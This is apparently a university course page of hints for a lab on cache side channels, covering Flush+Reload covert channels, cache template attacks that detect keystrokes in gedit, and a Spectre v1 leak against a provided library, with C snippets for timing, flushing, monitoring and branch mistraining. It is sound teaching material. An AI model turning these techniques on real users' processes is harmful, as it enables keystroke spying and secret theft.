Exercise 1: Software Security
Next Deadline: Monday, May 3 2021, 8:00am, Tasks 2-4
Additional Information and Hints
This page contains additional information and hints. For questions not answered here, try one of the support channels.
The tools and code are generally made for Linux, though porting cacheutils to Windows is possible. We do not provide a Windows library for Task 4, so you will need to develop it on Linux. However, all tasks, including Task 4, should work in WSL (with the exception of code that relies on virtual-to-physical address translation, such as the Prime+Probe calibration tool). The cache template attack reference is also only provided as a Linux binary.
As with WSL, most things can be done in VMs, but in general we recommend solving the tasks on native Linux to avoid issues.
If you have both Intel and AMD CPUs available, you may find it easier to work on Intel. While all of the concepts used in this exercise should apply to both, some implementations (such as Prime+Probe in the demos folder) are configured for an Intel cache layout. If you encounter unexpected behaviour or are unsure about the CPU available to you, don’t hesitate to ask.
It is very helpful to use cpupower or cpufreq-utils to set the system to performance mode (“sudo cpupower -c all set -b 0”). This makes your results more reliable and reproducible.
Do not rely on the threshold the calibration tools suggest. We provided you with the knowledge to choose a good threshold for a reason. Use your knowledge and choose a good threshold on your own.
We recommend compiling with -Os or -O3 for best performance with cache attacks.
Whenever you iterate over memory, consider the prefetcher. It is the prefetcher’s job to load memory it thinks you will need into the cache. When you’re doing cache attacks, this will ruin your day.
On Intel, the prefetcher will recognize patterns within a page – on AMD even when accesses are spaced out over multiple pages!
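Use the following code snippet to “randomize” the iterator i (here from 0 to 255) enough to confuse prefetchers:
int mix_i = ((i * 167) + 13) & 255;
Use mix_i instead of i to index your memory. Because 167 is odd, this mapping is a permutation of 0-255, so every index is still visited exactly once.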
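A minimal sketch of the mixed iteration, assuming 256 slots as in the snippet above. The helper names mix_index and visit_all_mixed are hypothetical; in an actual attack, the loop body would time the access to slot mix_i instead of counting visits.

```c
#include <assert.h>
#include <stddef.h>

/* Scrambles the loop counter i (0..255) so the prefetcher does not see a
 * simple ascending stride. 167 is odd, so i -> 167*i + 13 (mod 256) is a
 * bijection: every index in 0..255 is produced exactly once. */
static inline int mix_index(int i) {
    assert(i >= 0 && i < 256);
    return ((i * 167) + 13) & 255;
}

/* Hypothetical driver: walks all 256 slots in mixed order and counts visits.
 * In a real attack, you would time the access to slot mix_i here. */
static void visit_all_mixed(int visits[256]) {
    for (int i = 0; i < 256; i++) {
        int mix_i = mix_index(i);
        visits[mix_i]++;
    }
}
```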
Another annoying prefetcher is the adjacent line prefetcher: whenever a cache line is loaded, the adjacent line may be cached as well. Keep that in mind when deciding where to place the memory you probe.
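One common way to keep prefetchers from blurring neighbouring probe entries is to give each possible value its own page. The sketch below assumes 4 KiB pages and 64-byte cache lines (typical on x86); probe_buf, probe_slot and probe_init are hypothetical names. It is still worth combining this with the mixed iteration order, since AMD prefetchers can follow patterns across pages.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumption: 4096-byte pages. Each of the 256 possible values gets the
 * first line of its own page, so no two slots are adjacent lines. */
#define PROBE_SLOTS  256
#define PROBE_STRIDE 4096

static uint8_t probe_buf[PROBE_SLOTS * PROBE_STRIDE];

/* Address of the probe slot for `value`. */
static inline uint8_t *probe_slot(int value) {
    assert(value >= 0 && value < PROBE_SLOTS);
    return &probe_buf[(size_t)value * PROBE_STRIDE];
}

/* Write every slot once before using the buffer: untouched zero-initialized
 * pages may all be backed by the same shared zero page, which would make
 * distinct slots alias the same physical cache line. */
static void probe_init(void) {
    for (int v = 0; v < PROBE_SLOTS; v++)
        *probe_slot(v) = 1;
}
```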
- I’m on a Zen CPU and my F+R calibration works, but I don’t see anything on my covert channel between two threads. What’s going on?
Zen CPUs group cores into core complexes (CCXs), each with its own L3. This means your CPU may have more than one L3, and F+R won’t work across them.
You can check which core uses which L3 by running lscpu -e; the L3 entry of the L1d:L1i:L2:L3 column tells you what you need to know.
You can solve this problem by restricting your program to cores that share an L3, e.g., with
taskset -c X,Y ./channel
where X and Y are two such cores.
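If you prefer to pin from inside the program instead of using taskset, sched_setaffinity(2) does the same job. A sketch, assuming Linux with glibc; pin_to_cpu is a hypothetical helper, and the CPU numbers are whatever lscpu -e shows as sharing an L3.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sched.h>
#include <stdio.h>

/* Restricts the calling thread to a single logical CPU, similar in effect
 * to starting the program under `taskset -c <cpu>`.
 * Returns 0 on success, -1 on error. */
static int pin_to_cpu(int cpu) {
    assert(cpu >= 0 && cpu < CPU_SETSIZE);
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    /* pid 0 means "the calling thread" */
    if (sched_setaffinity(0, sizeof(set), &set) != 0) {
        perror("sched_setaffinity");
        return -1;
    }
    return 0;
}
```

For example, the sender could call pin_to_cpu(X) and the receiver pin_to_cpu(Y) before entering their main loops.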
The section “User configuration” contains the most important settings: the default cache miss timing and the timer to be used. On Intel CPUs, rdtsc and rdtscp should both work fine. On newer AMD CPUs (Zen 2 and later), you may want to try rdpru for increased accuracy.
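For reference, this is roughly what timing a single access with rdtscp looks like. It is a sketch assuming an x86-64 CPU and GCC or Clang (x86intrin.h), not the code from the provided library, and the fence placement is one common choice rather than the only correct one. time_access and flush are hypothetical names. Comparing hit and miss timings measured this way is one way to sanity-check the default cache miss timing.

```c
#include <assert.h>
#include <stdint.h>
#include <x86intrin.h>

/* Cycles needed for one load from p, measured with rdtscp. */
static inline uint64_t time_access(const volatile uint8_t *p) {
    unsigned int aux;                 /* receives IA32_TSC_AUX, unused here */
    _mm_mfence();                     /* earlier memory ops finish first */
    uint64_t start = __rdtscp(&aux);
    _mm_lfence();                     /* keep the load from starting early */
    uint8_t value = *p;               /* the access being timed */
    uint64_t end = __rdtscp(&aux);    /* waits for the load to complete */
    _mm_lfence();
    (void)value;
    return end - start;
}

/* Evicts the line containing p from the whole cache hierarchy. */
static inline void flush(const volatile uint8_t *p) {
    assert(p != NULL);
    _mm_clflush((const void *)p);
    _mm_mfence();
}
```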
Task 1 – Cache Histogram
Task 2 – Cache Covert Channel
Spawn two different processes that communicate with each other via a cache covert channel. If you use Flush+Reload, this will include establishing some type of shared memory.
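For Flush+Reload, a simple kind of shared memory is a file that both processes map: file-backed pages exist once in the page cache and are shared by every mapping of that file. A minimal sketch, assuming Linux; map_shared_file is a hypothetical helper, and which file you map (e.g., a shared library both processes already use, or a file you create yourself) is up to you.

```c
#include <assert.h>
#include <fcntl.h>
#include <stddef.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* Maps a whole file read-only and shared. If sender and receiver map the
 * same file, both mappings are backed by the same physical pages, so they
 * can Flush+Reload the same cache lines.
 * Returns NULL on error; *len receives the mapping size. */
static const unsigned char *map_shared_file(const char *path, size_t *len) {
    assert(path != NULL && len != NULL);
    int fd = open(path, O_RDONLY);
    if (fd < 0) return NULL;
    struct stat st;
    if (fstat(fd, &st) != 0 || st.st_size == 0) {
        close(fd);
        return NULL;
    }
    void *p = mmap(NULL, (size_t)st.st_size, PROT_READ, MAP_SHARED, fd, 0);
    close(fd);                        /* the mapping stays valid after close */
    if (p == MAP_FAILED) return NULL;
    *len = (size_t)st.st_size;
    return (const unsigned char *)p;
}
```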
There are no restrictions on how you start the transmission initially (you may even write to shared memory), but once it has started, no more direct communication is allowed.
You may use any scheme to keep the processes synchronized, though we recommend the KISS principle.
“Threads” refers to the total number of threads, counting both sender and receiver.
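One KISS-style way to keep sender and receiver synchronized is to let both sides agree on fixed time slots instead of exchanging messages. This sketch assumes an x86-64 CPU with an invariant TSC that is synchronized across cores (true on most modern x86 CPUs, but check yours). SLOT_CYCLES, next_slot_start and wait_for_next_slot are hypothetical, and the slot length is only a starting value to tune.

```c
#include <assert.h>
#include <stdint.h>
#include <x86intrin.h>

/* Hypothetical slot length in TSC ticks; tune for your machine. */
#define SLOT_CYCLES 100000ULL

/* First tick of the slot following the one that contains `now`. */
static inline uint64_t next_slot_start(uint64_t now, uint64_t slot) {
    assert(slot > 0);
    return (now / slot + 1) * slot;
}

/* Busy-waits until the next slot boundary and returns that slot's index.
 * Both processes calling this land on the same boundaries. */
static uint64_t wait_for_next_slot(void) {
    uint64_t target = next_slot_start(__rdtsc(), SLOT_CYCLES);
    while (__rdtsc() < target)
        _mm_pause();                  /* be polite to the sibling hyperthread */
    return target / SLOT_CYCLES;
}
```

Within each slot, the sender either accesses the shared line (1) or stays idle (0), and the receiver reloads and flushes it once per slot.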
Task 3 – Cache Template Attacks
You can find the tools shown in the lecture in your task3 subfolder.
If you want to reproduce the example shown in the lecture:
There are different gedit versions. Some use a “libgedit-private.so”. Check whether yours does with “cat /proc/$(pidof gedit)/maps | grep libgedit”.
If so, you should attack this file instead of “/usr/bin/gedit”, as this is more likely to succeed.
The .text section of the binary does not start at 0x0. Setting the offset (“./spy”) to the start of the .text section will reduce your search time.
As soon as you have found 1-2 significant peaks, you can stop the search; that is already enough for the exploitation.
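If you want to compute the start of the .text section yourself rather than reading it off readelf -S, the ELF section headers give it directly. This sketch assumes a 64-bit ELF file and that the spy expects a file offset (check its usage message); text_section_offset is a hypothetical helper.

```c
#include <assert.h>
#include <elf.h>
#include <stdio.h>
#include <string.h>

/* Returns the file offset of the .text section of a 64-bit ELF file,
 * or -1 if the file cannot be read or has no .text section. */
static long text_section_offset(const char *path) {
    assert(path != NULL);
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    long result = -1;
    Elf64_Ehdr eh;
    if (fread(&eh, sizeof eh, 1, f) != 1 ||
        memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 ||
        eh.e_ident[EI_CLASS] != ELFCLASS64)
        goto out;
    /* Section header of the section-name string table. */
    Elf64_Shdr strtab;
    if (fseek(f, (long)(eh.e_shoff + (Elf64_Off)eh.e_shstrndx * eh.e_shentsize), SEEK_SET) != 0 ||
        fread(&strtab, sizeof strtab, 1, f) != 1)
        goto out;
    for (int i = 0; i < eh.e_shnum; i++) {
        Elf64_Shdr sh;
        char name[16] = {0};          /* long enough for ".text" plus NUL */
        if (fseek(f, (long)(eh.e_shoff + (Elf64_Off)i * eh.e_shentsize), SEEK_SET) != 0 ||
            fread(&sh, sizeof sh, 1, f) != 1)
            break;
        if (fseek(f, (long)(strtab.sh_offset + sh.sh_name), SEEK_SET) != 0 ||
            fread(name, 1, sizeof name - 1, f) == 0)
            continue;
        if (strcmp(name, ".text") == 0) {
            result = (long)sh.sh_offset;
            break;
        }
    }
out:
    fclose(f);
    return result;
}
```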
For Task 3, you have to implement both parts of this yourself.
-> Implement one program that finds addresses that react to events (e.g., keystrokes), and another one that regularly checks your list of addresses and outputs the corresponding information.
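The second program boils down to a Flush+Reload loop over the addresses you found. A sketch of one pass, assuming x86-64 with GCC or Clang intrinsics and that base points to your mapping of the attacked file; reload_time and monitor_pass are hypothetical names, and threshold is the one you chose yourself.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <x86intrin.h>

/* Cycles needed to reload one address, measured with rdtscp. */
static inline uint64_t reload_time(const volatile uint8_t *p) {
    unsigned int aux;
    _mm_mfence();
    uint64_t start = __rdtscp(&aux);
    _mm_lfence();
    uint8_t value = *p;
    uint64_t end = __rdtscp(&aux);
    _mm_lfence();
    (void)value;
    return end - start;
}

/* One monitoring pass: for each address from the template phase, reload it,
 * record whether it was cached (i.e., used since our last flush), then flush
 * it again so the next pass starts from a clean state. */
static void monitor_pass(const uint8_t *base, const size_t *offsets, size_t n,
                         uint64_t threshold, int *hit) {
    assert(base != NULL && offsets != NULL && hit != NULL);
    for (size_t k = 0; k < n; k++) {
        const volatile uint8_t *p = base + offsets[k];
        hit[k] = reload_time(p) < threshold;
        _mm_clflush((const void *)p);
    }
    _mm_mfence();
}
```

Run monitor_pass in a loop with a short pause between passes and print (ideally with a timestamp) every address whose hit flag is set.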
Distinguishing different keys is very advanced. We don’t expect anyone to do that, though it would earn you bonus points.
Task 4 – Spectre
Familiarize yourself with the basic principle of Spectre-PHT, aka Spectre v1.
The library contains a branch that you can mistrain. If you do it right, you can then extract the secret with Flush+Reload, as explained in the lecture.
Start your implementation small! Try to leak only one known character in the beginning. Repeat the experiments often, and try different training parameters.
If you’re getting nothing but garbage, look at your cache threshold and the prefetcher tips.
If you see leakage but it is very slow, think about what you could do to slow down the branch you’re mistraining. What are its dependencies, can you stall them?
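When experimenting with training parameters, it helps to interleave training and attack calls without adding another, easily predicted branch. This is a sketch of the branch-free index selection used in the public Spectre v1 proof of concept (Kocher et al.), generalized to a configurable period. select_x and train_and_attack are hypothetical, and victim stands in for the library function containing the branch, whose real signature may differ.

```c
#include <assert.h>
#include <stddef.h>

/* Returns malicious_x when j % period == 0 and training_x otherwise,
 * computed without an if-statement. Requires 1 <= period <= 0x10000. */
static inline size_t select_x(size_t j, size_t period,
                              size_t training_x, size_t malicious_x) {
    /* high bits all set iff j % period == 0 (0 - 1 wraps to SIZE_MAX) */
    size_t x = ((j % period) - 1) & ~(size_t)0xFFFF;
    x = x | (x >> 16);                /* now either all ones or zero */
    return training_x ^ (x & (malicious_x ^ training_x));
}

/* Hypothetical driver: `period - 1` training calls per attack call, ending
 * with an attack call (j == 0). Flush your probe array before and run
 * Flush+Reload afterwards, as in your existing code. */
static void train_and_attack(void (*victim)(size_t), size_t rounds, size_t period,
                             size_t training_x, size_t malicious_x) {
    assert(victim != NULL && period >= 1 && period <= 0x10000);
    for (size_t j = rounds; j-- > 0;)
        victim(select_x(j, period, training_x, malicious_x));
}
```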